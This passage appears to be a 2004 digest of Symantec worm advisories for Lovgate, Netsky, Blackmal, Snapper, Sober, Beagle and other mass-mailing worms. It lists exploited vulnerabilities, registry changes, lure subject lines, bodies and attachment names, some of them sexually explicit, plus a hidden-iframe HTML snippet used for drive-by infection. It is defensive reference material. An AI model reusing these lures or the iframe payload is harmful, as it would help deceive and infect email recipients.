followed by one of the following:

If you can keep your head when all about you
Are losing theirs and blaming it on you;
If you can trust yourself when all men doubt you,
But make allowance for their doubting too;
If you can wait and not be tired by waiting,
Or, being lied about,don't deal in lies,
Or, being hated, don't give way to hating,
And yet don't look too good, nor talk too wise;
... ... more look to the attachment.

> Get your FREE <sender's domain>now! <

Attachment: The attachment is one of the following:

the hardcore game-.pif
Sex in Office.rm.scr
Deutsch BloodPatch!.exe
s3msong.MP3.pif
Me_nude.AVI.pif
How to Crack all gamez.exe
Macromedia Flash.scr
SETUP.EXE
Shakira.zip.exe
dreamweaver MX (crack).exe
StarWars2 - CloneAttack.rm.scr
Industry Giant II.exe
DSL Modem Uncapper.rar.exe
joke.pif
Britney spears nude.exe.txt.exe
I am For u.doc.exe

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.hllw.lovgate.n@mm.html

W32.HLLW.Polybot
Discovered March 19, 2004
Systems Affected: All Windows32 Systems

W32.HLLW.Polybot is a worm that attempts to spread through network shares that have weak passwords and allows attackers to access an infected computer using a predetermined IRC channel.

The worm uses multiple vulnerabilities to spread, including:

• The DCOM RPC vulnerability (described in Microsoft Security Bulletin MS03-026) using TCP port 135.
• The RPC locator vulnerability (described in Microsoft Security Bulletin MS03-001) using TCP port 445.
• The WebDav vulnerability (described in Microsoft Security Bulletin MS03-007) using TCP port 80

Releases confidential info: Allows unauthorized remote access.
Compromises security settings: Terminates antivirus and firewall processes.

Allows an attacker to remotely control a compromised computer and perform any of the following actions:

• Download and execute files
• Steal system information
• Harvest email addresses
• Steal CD keys for various games

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.hllw.polybot.html

W32.HLLW.Antinny.G
Discovered March 19, 2004
Systems Affected: All Windows32 Systems

The W32.HLLW.Antinny.G worm is a variant of W32.HLLW.Antinny. It spreads using the Winny file-sharing network.

The worm steals personal information, including name, email and files, and sends it to a file-sharing network.

The worm has the Notepad icon or a Windows folder icon.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.hllw.antinny.g.html

W32.Witty.Worm
Discovered March 20, 2004
Systems Affected: All Windows32 Systems

W32.Witty.Worm utilizes a Vulnerability in ICQ Parsing by ISS Products. The worm sends itself out to multiple IP addresses on source port 4000/UDP and a random destination port. The worm is a memory-only based threat and does not create files on the system.

The worm has a payload of overwriting random sectors of a random hard disk.

NOTE: If your system is not running a vulnerable version of one of the products affected, then you will not be infected. Products affected by this vulnerability are listed below:

BlackICE™ Agent for Server 3.6 ebz, ecd, ece, ecf
BlackICE PC Protection 3.6 cbz, ccd, ccf
BlackICE Server Protection 3.6 cbz, ccd, ccf
RealSecure® Network 7.0, XPU 22.4 and 22.10
RealSecure Server Sensor 7.0 XPU 22.4 and 22.10
RealSecure Desktop 7.0 ebf, ebj, ebk, ebl
RealSecure Desktop 3.6 ebz, ecd, ece, ecf
RealSecure Guard 3.6 ebz, ecd, ece, ecf
RealSecure Sentry 3.6 ebz, ecd, ece, ecf

If you are running a product that has the vulnerability used by the worm, we recommend that you apply the relevant patch as soon as possible. Patches for this vulnerability are available at http://blackice.iss.net/update_center/index.php.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.witty.worm.html

W32.Netsky.Q@mm
Discovered March 21, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.Q@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives. The "sender" of the email is spoofed, and its subject line and message body of the email vary. The attachment name varies with .exe, .pif, .scr, or .zip file extension.

The worm also trys to spread itself via varies file-sharing methods by copying itself into directories with enticing filename.

Explorer
system.
msgsvr32
winupd.exe
direct.exe
jijbl
service
Sentry

from the registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Deletes the values:

system.
Video

from the registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

Deletes these values:

Explorer
au.exe
direct.exe
d3dupdate.exe
OLE
gouday.exe
rate.exe
Taskmon
Windows Services Host
sysmon.exe
srate.exe
ssate.exe
winupd.exe

from the registry key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Deletes the following subkeys:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\PINF
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WksPatch
HKEY_CLASSES_ROOT\CLSID\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32

The email has the following characteristics:

From: <Spoofed>

Subject: The subject line is one of the following:

Re: Encrypted Mail
Re: Extended Mail
Re: Status
Re: Notify
Re: SMTP Server
Re: Mail Server
Re: Delivery Server
Re: Bad Request
Re: Failure
Re: Thank you for delivery
Re: Test
Re: Administration
Re: Message Error
Re: Error
Re: Extended Mail System
Re: Secure SMTP Message
Re: Protected Mail Request
Re: Protected Mail System
Re: Protected Mail Delivery
Re: Secure delivery
Re: Delivery Protection
Re: Mail Authentification

The worm avoids sending to the email addresses that contain any of the following strings:

"@microsof"
"@antivi"
"@symantec"
"@spam"
"@avp"
"@f-secur"
"@bitdefender"
"@norman"
"@mcafee"
"@kaspersky"
"@f-pro"
"@norton"
"@fbi"
"abuse@"
"@messagel"
"@skynet"
"@pandasof"
"@freeav"
"@sophos"
"ntivir"
"@viruslis"
"noreply@"
"spam@"
"reports@"

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.q@mm.html

W32.Netsky.P@mm
Discovered March 21, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.P@mm (also known as W32.Netsky.Q@mm) is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives. The worm also tries to spread through various file-sharing programs by copying itself into various shared folders.

The From line of the email is spoofed, and its Subject line and message body of the email vary. The attachment name varies with the .exe, .pif, .scr, or .zip file extension.

The worm uses the Incorrect MIME Header Can Cause IE to Execute E-mail Attachment vulnerability to cause unpatched systems to auto-execute the worm when reading or previewing an infected message.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.p@mm.html

Download the removal tool here

W32.HLLW.Lovgate.O@mm
Discovered March 23, 2004
Systems Affected: All Windows32 Systems

W32.HLLW.Lovgate.O@mm is a variant of W32.HLLW.Lovgate@mm. This variant is also a mass-mailing worm that attempts to reply to all the email messages in the Microsoft Outlook Inbox. The "sender" of the email is spoofed, and its subject line and message vary. The attachment name varies with a .exe, .pif, or .scr file extension.

This worm also attempts to copy itself to all the computers on a local network and to Kazaa-shared folders.

Compromises security settings: Terminates processes belonging to various antivirus programs.

Replies to all the incoming messages when they arrive in the mailbox of certain MAPI-compliant email clients, which include Microsoft Outlook.

If the original email is:

Subject: <subject>
From: <sender>@<domain.com>
Message: <original message body>

the worm will attempt to send the following email:

Subject: Re: <subject>
To: <sender>@<domain.com>

Message:
'<sender>' wrote:
====
> <original message body>
====

<domain.com> account auto-reply:

If you can keep your head when all about you
Are losing theirs and blaming it on you;
If you can trust yourself when all men doubt you,
But make allowance for their doubting too;
If you can wait and not be tired by waiting,
Or, being lied about,don't deal in lies,
Or, being hated, don't give way to hating,
And yet don't look too good, nor talk too wise;
... ... more look to the attachment.

> Get your FREE <domain.com> account now! <

Attachment: The attachment is one of the following:

the hardcore game-.pif
Sex in Office.rm.scr
Deutsch BloodPatch!.exe
s3msong.MP3.pif
Me_nude.AVI.pif
How to Crack all gamez.exe
Macromedia Flash.scr
SETUP.EXE
Shakira.zip.exe
dreamweaver MX (crack).exe
StarWars2 - CloneAttack.rm.scr
Industry Giant II.exe
DSL Modem Uncapper.rar.exe
joke.pif
Britney spears nude.exe.txt.exe
I am For u.doc.exe

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.hllw.lovgate.o@mm.html

W32.Gaobot.SA
Discovered March 23, 2004
Systems Affected: All Windows32 Systems

W32.Gaobot.SA is a worm that attempts to spread through network shares that have weak passwords and allows attackers to access an infected computer using a predetermined IRC channel.

The worm uses multiple vulnerabilities to spread, including:

The DCOM RPC vulnerability (described in Microsoft Security Bulletin MS03-026) using TCP port 135.
The WebDav vulnerability (described in Microsoft Security Bulletin MS03-007) using TCP port 80.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.gaobot.sa.html

W32.Blackmal@mm
Discovered March 23, 2004
Systems Affected: All Windows32 Systems

W32.Blackmal@mm is a massmailing worm. It uses its own SMTP engine to email itself to all the contacts in the MSN Messenger, Yahoo Pager, and in the files whose extensions are .htm or .dbx . The email message has a randomly chosen subject line, message, and attachment. The attachment will have .src, .exe, .zip, or .tgz file extension.

W32.Blackmal@mm uses Windows Media Player presentation to mask its malicious intentions and attempts to delete security software and system files.

Subject: (Some possible subject lines are listed below.)
Alert
Fw: Virus Alert
FW: (-Sucking-)
FW: File - WebCam.mpeg
FW: **Hot Movie**
Re: Why? Form Back.mpg
FW:RE: Least *21* Years
Re: Double suck (movie)
FW:Re:Hot Erotic
very hot XXX
Video Clip
RE: FW: Women Mpeg
Asses Mpeg's
FW: Lesbian & gays Mpeg
Fw: My Funny Ass

Body: (Some possible message bodies are listed below.)

This email is sent to you because one
or some of your friends has been infected
with The W32.BlackWorm.A@mm
Virus.
And you could be infected
too.This Virus has the ability to
damage the hard disk.
This Virus infects computers using many
new ways :
1- it arrives as an email attachment
inside of jpg pictures.
2- it infects the ip address without
the victim's knowledge.
3- it infects Microsoft Word Documents
using a new exploit in hex (00fxf0xf10x).
Symantec Security Response has attached a removal
tool to clean and prevent the infections of
W32.BlackWorm.A@mm

Cum and check this fun group out...Sexy ladies!! Come post your ad,..this is a real swingers group!!
I'm attatching a Video Clip of my wife if interested in checking it out!
Watch the Paris Hilton Sex Tape for Free!
Video's Girls Erotic WebCam's Tits Mpeg's Girls Ass SEX Pussy Video Clips
Here is another Vclip of my daily group :|
All kinda Women Can be Found Here To Satisfy Women Lovers' Eyes
Dozens of Free Video Clips to download.Many Niches. Updated regularly and more added daily.Taken From Vivi's Lovely Briefcase.
hey guys my name is April Goostree i am a sexy 22 yr old bbw , 5'9, 48 dd , big ole booty, jus lovin life, until i get my pics posted in here you can either check out my profile or join my own yahoo group Texas-Sexy@groups.msn.com, either way works for me..i hope to become very active in this group, i like to get to know people, like to get on cam once in a while, jus to chill, when they aint none home..thats why its once in a while yaknow..anyways jus holla at me... n thanks for lettin me join!!! kisses kandee..Bye
very good movie >>> Video's Media Player. SEX SEX * Sluts Tits Video Mpeg's Mpeg Video Clips
-==This server does not support Transfer Big Movies==- wo Hotttt gurls sucking a hansum cock Softly
u Love asses? Here is a great ass open wide waitin for ur lil Cock
movie attached open by media Player 7.1
when i saw my ass i slept 3 hours why?? check my ass sorry my movie
LOOOOOOOOL joke (^!^)
Check This ?ucking Babe ;D

Attachments: (Some possible file names are listed below.)

Julia_1997_Fucking.MPEG_.scr
juanita_in_the_kitchen.MPEG.scr
17Ag_double_suck__part[2].MPEG_.scr
April_FromTexas.MPEG_.scr
Video_briefcase_Group[13].MPEG_.scr
After_2AM_small_room[4].MPEG__.scr
Graham_Hilton_Sex[4].MPEG__.scr
WebCam_12girls_Ass.mpeg_.scr
Shakira_Anal_very_old.MPEG.scr
why_fuck_anal_back.MPEG.scr
open_girl_21year.MPEG.scr
Ricky_Gay_ass.MPEG______________.scr
GrahamCluley_freakin_Ass_.MPEG__.scr
Sexual_Crimes.MPEG____.scr
Fix_BlackWorm.com

or

hard_babe
AprilGoostree
Video
JuliaRoberts
BigFuck
hotsucking
ParisHilton
Shakira
Vclip2
easyFuck_GIRL
RickyMartin
AssClip
SexCrimes
Scan

The above filenames are followed by one or two of the following file extenstion:
.zip
.exe
.tgz

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.blackmal@mm.html

W32.Snapper.A@mm
Discovered March 24, 2004
Systems Affected: All Windows32 Systems

W32.Snapper.A@mm is a worm that spreads to all the contacts in the Windows Address Book.
It does not send itself as an email attachment. Instead, it exploits the Internet Explorer Object
Tag Vulnerability that is described in Microsoft Security Bulletin MS03-032. This vulnerability
allows W32.Snapper.A@mm to automatically download and install the worm when the email is opened.

The email has the following characteristics:

From: <Spoofed>
Subject: Re:
Message: The message body consists of the following HTML code, which will appear to be a blank message when loaded by most mail clients:

<HTML><BODY><IFRAME src='http://<omitted>/banner.htm' style='display:none'></IFRAME></HTML></BODY>

Payload: May display popup advertisements.
Large scale e-mailing: Mass-mails itself to contacts in the Windows Address Book
Compromises security settings: Terminates some antivirus processes.

Uses its own SMTP engine to send a message to all the contacts in the Windows Address Book.

The message has the following format:

From: <Spoofed>

Subject: Re:

Message: The message body consists of the following HTML code, which will appear to be a blank message when loaded by most mail clients:

<HTML><BODY><IFRAME src='http://(omitted)/banner.htm' style='display:none'></IFRAME></HTML></BODY>

When an email client loads this message, it downloads and displays the file Banner.htm.

Banner.htm
At the time of this writing, Banner.htm is a Web page that appears to be blank, but actually contains links to the worm. This page uses the Internet Explorer Object Tag Vulnerability described in Microsoft Security Bulletin MS03-032 to automatically download a malicious html file, Htmlhelp.cgi.

Htmlhelp.cgi
This is an HTML file containing an encoded copy of the worm .dll. This file contains a VBScript that installs the worm as %Windir%\ieload.dll.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.snapper.a@mm.html

W32.Beagle.U@mm
Discovered March 26, 2004
Systems Affected: All Windows32 Systems

W32.Beagle.U@mm is a variant of W32.Beagle.T@mm. The worm
sends itself as an email with a blank subject and body and a randomly
named attachment. It also opens a backdoor on TCP port 4751.
The attachment name is a random string of letters with an .exe extension.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.u@mm.html

W32.Sober.E@mm
Discovered March 27, 2004
Systems Affected: All Windows32 Systems

W32.Sober.E@mm is a variant of W32.Sober.D@mm that spreads by
sending itself as an email attachment using its own SMTP engine.

The Subject: and Body: of the email vary and is written in English.

Graphic Modul not found
Microsoft Windows
STOP: 0x80070725 {FatalSystemError}
System File [filename].exe
Connection lost or blocked by Firewall

The From field will consist of one of the following strings followed by @gmx.net or @gmx.de
aRuder
g.rulers
S.Serger
Dude-X777
Nicole.Pam
R.Summer
T.Welder
Susan.Ewing
E.Ruders
Blond.Sybil
Michelle.Horn
Sabine.S-1977
E.Juller
Pamela-S
J.Moders
Regina-1978
BMueller4
Elsbeth.Sinker
Thomas.Schmahler
Nikki.1978
D.Rotter
Patricia.1979
Patty.Geldorf
H.Molma
Birgit.Muse
Peter.Selders
Johanna.1980
Nicole.Gellert
R.Niere
P.Schulz1
Kalif.Rent
Herbert.Weed
FParker
Samatha.Kelis
Kate.Lee
Bibi.Besen
Julia.Witt1
Alexander.Bendher
Rosemarie.Hetter
A.Rebert
Elke.Duerr
D.Winter1
Angelika.Neum
A.Kempen
KevinEder
Susan.Leet
Friedhelm.alt
Seth.Liveima
Eileen.Leen
D.Augustam
B.Kaine
MikeLord
Kathe.Meet
Marie.Dreher
Tom.Schon
Lisa.Redfield
P.Schulz1
C.Poller
Ulrike.Falkner
b.sieber006
Jundel
A.Mack1
R.Kleinmaurer
S.Loltke

The Subject will consist of one of the following strings:
Hi
hi
Hi :-)
Ok ;-)
OK OK
OK Ok OK!
Hey!
Thx !!!

followed by
Message-ID: <%Random_String%.qmail>

The Body of the message will contain:
;-)
ha!
HA :-)
yo!
lol
LoL
LOL
Yo!

The Attachment filename will be one of the following:
Text.zip
Text.pif
Read.zip
Read.pif
Graphic-doc.zip
Graphic-doc.pif
document.zip
document.pif
Word.zip
Word.pif

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.sober.e@mm.html

W32.Beagle.V@mm
Discovered March 29, 2004
Systems Affected: All Windows32 Systems

W32.Beagle.V@mm is a variant of W32.Beagle.U@mm. The worm sends itself as
an email with a blank subject and body and a randomly named attachment. It also opens a backdoor on TCP port 4751.The attachment name is game.exe.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.v@mm.html

W32.Netsky.R@mm
Discovered March 31, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.R@mm is a mass-mailing worm, and a variant of W32.Netsky.Q@mm. This worm has been packed with a known runtime compression utility.

Emails all addresses found in certain files on the system.

Launches many threads, that may result in system instability.

Searches files on the system for email addresses. The worm will search local and mapped drives. The worm contains its own SMTP engine, and it will compose an email message with the following characteristics.

Subject
RE: Document [%i] (where [%i] may be a random number)

From
[Spoofed]

Body
Excuse me,
the important document is attached,
Your sincerely

Attachment
Document[%i].pif

The worm will send an email message to all contacts that were found when scanning the system for email addresses, and it may send an email message to jena@yahoo.cz.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.r@mm.html